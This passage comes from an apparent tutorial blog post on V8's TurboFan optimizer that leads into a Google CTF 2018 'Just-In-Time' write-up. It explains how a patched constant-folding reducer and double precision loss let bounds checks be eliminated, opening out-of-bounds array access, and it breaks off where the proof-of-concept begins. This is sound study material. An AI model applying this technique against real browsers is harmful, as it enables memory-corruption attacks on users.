class="keyword">switch</span> (function.<span class="built_in">shared</span>().<span class="built_in">builtin_function_id</span>()) &#123;</span><br><span class="line">    <span class="keyword">case</span> BuiltinFunctionId::kMathRandom:</span><br><span class="line">      <span class="keyword">return</span> Type::<span class="built_in">PlainNumber</span>();</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure></li><li><p>For a numeric constant, i.e. a <code>NumberConstant</code> node, <code>TyperPhase</code> likewise assigns a corresponding type:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeNumberConstant</span>(Node* node) &#123;</span><br><span class="line">  <span class="comment">// Note that a double is used here, which is why Number.MAX_SAFE_INTEGER = 9007199254740991 (2^53 - 1)</span></span><br><span class="line">  <span class="type">double</span> number = <span class="built_in">OpParameter</span>&lt;<span class="type">double</span>&gt;(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">NewConstant</span>(number, <span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Inside <code>Type::NewConstant</code> we find an interesting design choice:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Type <span class="title">Type::NewConstant</span><span class="params">(<span class="type">double</span> value, Zone* zone)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// For an ordinary integer value</span></span><br><span class="line">  <span class="keyword">if</span> (RangeType::<span class="built_in">IsInteger</span>(value)) &#123;</span><br><span class="line">    <span class="comment">// the Type that gets set is actually a range!</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Range</span>(value, value, zone);</span><br><span class="line">  <span class="comment">// Otherwise, for the special value -0, return the corresponding MinusZero</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">IsMinusZero</span>(value)) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">MinusZero</span>();</span><br><span class="line">  <span class="comment">// For NaN, return NaN</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (std::<span class="built_in">isnan</span>(value)) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">NaN</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(OtherNumberConstantType::<span class="built_in">IsOtherNumberConstant</span>(value));</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">OtherNumberConstant</span>(value, zone);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>For a NumberConstant in JS code, <strong>the Type that gets set is actually a Range</strong> whose lower and upper bounds are both that number, for example <code>NumberConstant(3) =&gt; Range(3, 3, zone)</code>.</p></li><li><p>The figure below confirms that <code>TyperPhase</code> behaves as expected:</p><p><img src="/2021/01/v8-turboFan/typer.png" alt="img"></p></li><li><p>Relatedly, V8 uses SSA. For a Phi node, the Typer therefore sets the node's Type to the union of the Ranges of its possible input values.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypePhi</span>(Node* node) &#123;</span><br><span class="line">  <span class="type">int</span> arity = node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ValueInputCount</span>();</span><br><span class="line">  Type type = <span class="built_in">Operand</span>(node, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">1</span>; i &lt; arity; ++i) &#123;</span><br><span class="line">    type = Type::<span class="built_in">Union</span>(type, <span class="built_in">Operand</span>(node, i), <span class="built_in">zone</span>());</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> type;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Consider the following example:</p><p><img src="/2021/01/v8-turboFan/phi.png" alt="img"></p></li></ul><h3 id="4-SimplifiedLoweringPhase">4. 
SimplifiedLoweringPhase</h3><ul><li><p><code>SimplifiedLoweringPhase</code> walks over the nodes, processes them, and also applies some optimizations to the graph.</p><p>Here we only look at how this <code>Phase</code> optimizes <code>CheckBounds</code>, because <code>CheckBounds</code> is the node that is typically inserted to verify that an access to a JS array (e.g. one backed by an ArrayBuffer) stays in bounds.</p></li><li><p>The code that optimizes <code>CheckBounds</code> can be reached through the following call path:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SimplifiedLoweringPhase::Run</span><br><span class="line">    SimplifiedLowering::LowerAllNodes</span><br><span class="line">      RepresentationSelector::Run</span><br><span class="line">        RepresentationSelector::VisitNode</span><br></pre></td></tr></table></figure><p>The relevant code is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span 
class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Dispatching routine for visiting the node &#123;node&#125; with the usage &#123;use&#125;.</span></span><br><span class="line">  <span class="comment">// Depending on the operator, propagate new usage info to the inputs.</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">VisitNode</span><span class="params">(Node* node, Truncation truncation,</span></span></span><br><span class="line"><span class="params"><span class="function">                SimplifiedLowering* lowering)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Unconditionally eliminate unused pure nodes (only relevant if there&#x27;s</span></span><br><span class="line">    <span class="comment">// a pure operation in between two effectful ones, where the last one</span></span><br><span class="line">    <span class="comment">// is unused).</span></span><br><span class="line">    <span class="comment">// Note: We must not do this for constants, as they are cached and we</span></span><br><span class="line">    <span class="comment">// would thus kill the cached &#123;node&#125; during lowering (i.e. 
replace all</span></span><br><span class="line">    <span class="comment">// uses with Dead), but at that point some node lowering might have</span></span><br><span class="line">    <span class="comment">// already taken the constant &#123;node&#125; from the cache (while it was in</span></span><br><span class="line">    <span class="comment">// a sane state still) and we would afterwards replace that use with</span></span><br><span class="line">    <span class="comment">// Dead as well.</span></span><br><span class="line">    <span class="keyword">if</span> (node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ValueInputCount</span>() &gt; <span class="number">0</span> &amp;&amp;</span><br><span class="line">        node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">HasProperty</span>(Operator::kPure)) &#123;</span><br><span class="line">      <span class="keyword">if</span> (truncation.<span class="built_in">IsUnused</span>()) <span class="keyword">return</span> <span class="built_in">VisitUnused</span>(node);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">        <span class="keyword">case</span> IrOpcode::kCheckBounds: &#123;</span><br><span class="line">            <span class="type">const</span> CheckParameters&amp; p = <span class="built_in">CheckParametersOf</span>(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">            Type index_type = <span class="built_in">TypeOf</span>(node-&gt;<span class="built_in">InputAt</span>(<span class="number">0</span>));</span><br><span class="line">            Type length_type = <span class="built_in">TypeOf</span>(node-&gt;<span class="built_in">InputAt</span>(<span class="number">1</span>));</span><br><span class="line">            <span 
class="keyword">if</span> (index_type.<span class="built_in">Is</span>(Type::<span class="built_in">Integral32OrMinusZero</span>())) &#123;</span><br><span class="line">              <span class="comment">// Map -0 to 0, and the values in the [-2^31,-1] range to the</span></span><br><span class="line">              <span class="comment">// [2^31,2^32-1] range, which will be considered out-of-bounds</span></span><br><span class="line">              <span class="comment">// as well, because the &#123;length_type&#125; is limited to Unsigned31.</span></span><br><span class="line">              <span class="built_in">VisitBinop</span>(node, UseInfo::<span class="built_in">TruncatingWord32</span>(),</span><br><span class="line">                        MachineRepresentation::kWord32);</span><br><span class="line">              <span class="keyword">if</span> (<span class="built_in">lower</span>() &amp;&amp; lowering-&gt;poisoning_level_ ==</span><br><span class="line">                                PoisoningMitigationLevel::kDontPoison) &#123;</span><br><span class="line">                <span class="comment">// If the maximum of the index is below the minimum of the length, the access cannot be out of bounds</span></span><br><span class="line">                <span class="keyword">if</span> (index_type.<span class="built_in">IsNone</span>() || length_type.<span class="built_in">IsNone</span>() ||</span><br><span class="line">                    (index_type.<span class="built_in">Min</span>() &gt;= <span class="number">0.0</span> &amp;&amp;</span><br><span class="line">                    index_type.<span class="built_in">Max</span>() &lt; length_type.<span class="built_in">Min</span>())) &#123;</span><br><span class="line">                  <span class="comment">// The bounds check is redundant if we already know that</span></span><br><span class="line">                  <span class="comment">// the index is within the bounds of [0.0, length[.</span></span><br><span class="line">                  <span class="comment">// 
The CheckBounds node is optimized away here</span></span><br><span class="line">                  <span class="built_in">DeferReplacement</span>(node, node-&gt;<span class="built_in">InputAt</span>(<span class="number">0</span>));</span><br><span class="line">                &#125;</span><br><span class="line">              &#125;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">              <span class="built_in">VisitBinop</span>(</span><br><span class="line">                  node,</span><br><span class="line">                  UseInfo::<span class="built_in">CheckedSigned32AsWord32</span>(kIdentifyZeros, p.<span class="built_in">feedback</span>()),</span><br><span class="line">                  UseInfo::<span class="built_in">TruncatingWord32</span>(), MachineRepresentation::kWord32);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">          &#125;</span><br><span class="line">    <span class="comment">// ....</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure><p>As the <code>CheckBounds</code> logic shows, if the index is known to be non-negative and its maximum is smaller than the minimum of the length, the access cannot go out of bounds, so the <code>CheckBounds</code> node is removed to simplify the IR graph.</p><blockquote><p>Note that the Type of a NumberConstant node is a Range, which is why the notions of a maximum (Max) and a minimum (Min) exist at all.</p></blockquote></li><li><p>This is the place to explain why the environment setup <strong>adds the build argument <code>v8_untrusted_code_mitigations = false</code></strong>. Look at this line of the condition above:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="built_in">lower</span>() &amp;&amp; lowering-&gt;poisoning_level_ ==</span><br><span class="line">                                  
PoisoningMitigationLevel::kDontPoison)</span><br></pre></td></tr></table></figure><p><code>VisitNode</code> runs in three phases: <code>Phase::PROPAGATE</code> (collecting usage information), <code>Phase::RETYPE</code> (propagating types obtained from type feedback), and <code>Phase::LOWER</code> (performing the actual lowering). Once the <strong>lowering</strong> really starts, <code>lower()</code> is true, so this part of the condition needs no special handling.</p><p>The second part is different. Dynamic debugging shows that <code>poisoning_level_</code> is never <code>PoisoningMitigationLevel::kDontPoison</code> in a default build. Tracing <code>lowering-&gt;poisoning_level_</code> back, we find that it is set in <code>PipelineCompilationJob::PrepareJobImpl</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">PipelineCompilationJob::Status <span class="title">PipelineCompilationJob::PrepareJobImpl</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    Isolate* isolate)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="comment">// Compute and set poisoning level.</span></span><br><span class="line">  PoisoningMitigationLevel load_poisoning =</span><br><span class="line">      PoisoningMitigationLevel::kDontPoison;</span><br><span class="line">  <span class="keyword">if</span> (FLAG_branch_load_poisoning) &#123;</span><br><span class="line">    load_poisoning = PoisoningMitigationLevel::kPoisonAll;</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (FLAG_untrusted_code_mitigations) &#123;</span><br><span class="line">    load_poisoning 
= PoisoningMitigationLevel::kPoisonCriticalOnly;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>By default, <code>FLAG_branch_load_poisoning</code> is <code>false</code> and <code>FLAG_untrusted_code_mitigations</code> is <code>true</code>.</p><blockquote><p>The build argument v8_untrusted_code_mitigations defaults to true, so the macro DISABLE_UNTRUSTED_CODE_MITIGATIONS is not defined and the default becomes <code>FLAG_untrusted_code_mitigations = true</code>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/flag-definitions.h</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Defines `FLAG_untrusted_code_mitigations`</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DISABLE_UNTRUSTED_CODE_MITIGATIONS</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS false</span></span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS true</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"><span class="built_in">DEFINE_BOOL</span>(untrusted_code_mitigations, 
V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS,</span><br><span class="line">            <span class="string">&quot;Enable mitigations for executing untrusted code&quot;</span>)</span><br><span class="line"><span class="meta">#<span class="keyword">undef</span> V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Defines `FLAG_branch_load_poisoning`</span></span><br><span class="line"><span class="built_in">DEFINE_BOOL</span>(branch_load_poisoning, <span class="literal">false</span>, <span class="string">&quot;Mask loads with branch conditions.&quot;</span>)</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># BUILD.gn</span></span><br><span class="line">declare_args() &#123;</span><br><span class="line">  <span class="comment"># ...</span></span><br><span class="line">  <span class="comment"># Enable mitigations for executing untrusted code.</span></span><br><span class="line">  <span class="comment"># Defaults to true</span></span><br><span class="line">  v8_untrusted_code_mitigations = true</span><br><span class="line">  <span class="comment"># ...</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment"># ...</span></span><br><span class="line"><span class="keyword">if</span> (!v8_untrusted_code_mitigations) &#123;</span><br><span class="line">    defines += [ <span class="string">&quot;DISABLE_UNTRUSTED_CODE_MITIGATIONS&quot;</span> 
]</span><br><span class="line">  &#125;</span><br><span class="line"><span class="comment"># ...</span></span><br></pre></td></tr></table></figure><p>As a result, <code>load_poisoning</code> is always <code>PoisoningMitigationLevel::kPoisonCriticalOnly</code> in a default build, and the <code>CheckBounds</code> elimination never runs. We therefore have to set the build argument <code>v8_untrusted_code_mitigations = false</code> by hand to enable it.</p></li><li><p>Here is a simple example of CheckBounds elimination:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">const</span> arr = <span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>);</span><br><span class="line">  <span class="keyword">let</span> t = <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title 
function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p>Before the optimization, the graph contains a CheckBounds node:</p><p><img src="/2021/01/v8-turboFan/checkbounds1.png" alt="img"></p><p>After <code>SimplifiedLoweringPhase</code> has run, the <code>CheckBounds</code> node has been eliminated:</p><p><img src="/2021/01/v8-turboFan/checkbounds2.png" alt="img"></p></li></ul><blockquote><p>That covers the basic concepts. Next, let's practice on a CTF challenge.</p></blockquote><h2 id="六、Google-CTF-2018-final-Just-In-Time">VI. Google CTF 2018 (final) Just-In-Time</h2><h3 id="1-简介-2">1. Introduction</h3><p>Google CTF 2018 (final) Just-In-Time is a basic v8 challenge and a good entry point to v8 JIT exploitation. The goal is to execute <code>/usr/bin/gnome-calculator</code> and pop a calculator. We use this challenge to learn the relevant v8 concepts.</p><p>Many write-ups for this challenge exist on Anquanke, but since this is my first v8 challenge, this post goes through the details step by step.</p><ul><li>Challenge source - <a href="https://ctftime.org/task/6982">ctftime - task6982</a></li><li>Official Just-In-Time attachments and exploit - <a href="https://github.com/google/google-ctf/tree/master/2018/finals/pwn-just-in-time">github</a></li></ul><h3 id="2-环境搭建">2. Environment setup</h3><p>The challenge attachment (the one on ctftime, not the one on github) contains a prebuilt chromium and two patch files.</p><ul><li><code>nosandbox.patch</code>: disables the renderer sandbox.</li><li><code>addition-reducer.patch</code>: the core of the challenge.</li><li><code>chromium</code>: a binary package of version <code>70.0.3538.9</code> (already patched)</li></ul><p>Since I already had a v8 build environment, I decided to build v8 from source instead, which <strong>makes debugging much easier</strong>. The v8 version for this challenge is <strong>7.0.276.3</strong>; it can be read from <code>chrome://version</code> or looked up in the <a href="https://omahaproxy.appspot.com/">OmahaProxy CSV Viewer</a>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Start the proxy</span></span><br><span class="line"><span class="built_in">sudo</span> service privoxy start</span><br><span class="line"><span class="built_in">export</span> https_proxy=http://127.0.0.1:8118</span><br><span class="line"><span class="built_in">export</span> http_proxy=http://127.0.0.1:8118</span><br><span class="line"><span class="comment"># Switch to the v8 version used by the challenge</span></span><br><span class="line"><span class="built_in">cd</span> v8/</span><br><span class="line">git checkout 7.0.276.3 <span class="comment"># add -f to force if needed; the same applies to gclient</span></span><br><span class="line">gclient <span class="built_in">sync</span> <span class="comment"># this step needs the proxy (important) and can take a long time, depending on network speed</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Apply the patch once gclient sync has finished</span></span><br><span class="line">git apply ../../../CTF/GoogleCTF2018_Just-In-Time/addition-reducer.patch</span><br><span class="line"><span class="comment"># Generate the build configuration</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line"><span class="comment"># Allow CheckBounds elimination</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;v8_untrusted_code_mitigations = false&quot;</span> &gt;&gt; out.gn/x64.debug/args.gn</span><br><span class="line"><span class="comment"># Build</span></span><br><span class="line">ninja -C out.gn/x64.debug</span><br></pre></td></tr></table></figure><blockquote><p>For why <code>v8_untrusted_code_mitigations = false</code> is needed, see the short explanation of CheckBounds elimination in the <code>SimplifiedLoweringPhase</code> section above.</p><p>The challenge author probably forgot to publish the v8 build arguments; with the default arguments the vulnerability <strong>cannot be exploited</strong>.</p></blockquote><h3 id="3-漏洞成因">3. 
Root cause of the vulnerability</h3><ul><li><p>The patch adds a new optimization to TurboFan's <code>TypedLoweringPhase</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DuplicateAdditionReducer::Reduce</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kNumberAdd:</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">ReduceAddition</span>(node);</span><br><span class="line">    <span 
class="keyword">default</span>:</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">Reduction <span class="title">DuplicateAdditionReducer::ReduceAddition</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ControlInputCount</span>(), <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">EffectInputCount</span>(), <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ValueInputCount</span>(), <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">  Node* left = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> (left-&gt;<span class="built_in">opcode</span>() != node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  Node* right = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> (right-&gt;<span class="built_in">opcode</span>() != IrOpcode::kNumberConstant) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  
&#125;</span><br><span class="line"></span><br><span class="line">  Node* parent_left = NodeProperties::<span class="built_in">GetValueInput</span>(left, <span class="number">0</span>);</span><br><span class="line">  Node* parent_right = NodeProperties::<span class="built_in">GetValueInput</span>(left, <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> (parent_right-&gt;<span class="built_in">opcode</span>() != IrOpcode::kNumberConstant) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="type">double</span> const1 = <span class="built_in">OpParameter</span>&lt;<span class="type">double</span>&gt;(right-&gt;<span class="built_in">op</span>());</span><br><span class="line">  <span class="type">double</span> const2 = <span class="built_in">OpParameter</span>&lt;<span class="type">double</span>&gt;(parent_right-&gt;<span class="built_in">op</span>());</span><br><span class="line">  Node* new_const = <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">common</span>()-&gt;<span class="built_in">NumberConstant</span>(const1+const2));</span><br><span class="line"></span><br><span class="line">  NodeProperties::<span class="built_in">ReplaceValueInput</span>(node, parent_left, <span class="number">0</span>);</span><br><span class="line">  NodeProperties::<span class="built_in">ReplaceValueInput</span>(node, new_const, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This reducer rewrites expressions such as <code>x + 1 + 2</code> into <code>x + 3</code>, which is Case 4 in the figure below:</p><p><img src="/2021/01/v8-turboFan/schema_vuln_ctf.png" 
alt="img"></p></li><li><p>However, recall that NumberConstant is implemented internally with the <code>double</code> type, which means this optimization can be affected by precision loss. For example:</p><p><img src="/2021/01/v8-turboFan/JStest.png" alt="img"></p><p>In other words, <code>x + 1 + 1</code> is not always equal to <code>x + 2</code>, so the optimization is unsound.</p></li><li><p>Why is that? The reason lies in the IEEE 754 floating-point standard. A double has a fixed number of significand bits, so as the value grows only the high-order bits can be kept. Once the value passes a certain limit, the low-order bits are dropped, not every integer can be represented any more, and precision is lost.</p><p>That limit is exactly $2^{53}-1 = 9007199254740991$, the <code>MAX_SAFE_INTEGER</code> in the figure above.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Bit layout of 9007199254740991 as a double: the 52-bit fraction is all ones, so every integer up to this value is exactly representable.</span></span><br><span class="line">+------+--------------+------------------------------------------------------+</span><br><span class="line">| sign |    exponent  |                fraction                              |</span><br><span class="line">+------+--------------+------------------------------------------------------+</span><br><span class="line">|   <span class="number">0</span>  |  <span class="number">10000110011</span> | <span class="number">1111111111111111111111111111111111111111111111111111</span> |</span><br><span class="line">+------+--------------+------------------------------------------------------+</span><br></pre></td></tr></table></figure></li><li><p>Since <code>x + 1 + 1 &lt;= x + 2</code>, the <code>Type</code> of a <code>NumberAdd</code> node, i.e. <strong>its Range, can end up smaller than the value the node actually produces</strong>. For example:</p><ul><li>After adding <strong>+1</strong> twice to <code>9007199254740992</code>, precision loss makes the Type of the last <code>NumberAdd</code> node <code>Range(9007199254740992,9007199254740992)</code>.</li><li>But because the optimization from the patch has been applied, the last addition actually evaluates to <code>9007199254740994</code>, which is larger than the maximum of the Range.</li><li>If this result is then used to index an array, an out-of-bounds read or write becomes possible: when the expected index is below the minimum of the length, the CheckBounds node is eliminated, and the <strong>actual index</strong>, which covers a larger range than the <strong>expected index</strong>, may well go out of bounds.</li></ul></li></ul><h3 id="4-漏洞利用">4. Exploitation</h3><h4 id="a-OOB">a. OOB</h4><h5 id="1-构造POC">1) Building the PoC</h5><ul><li><p>Let's try a PoC first:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span 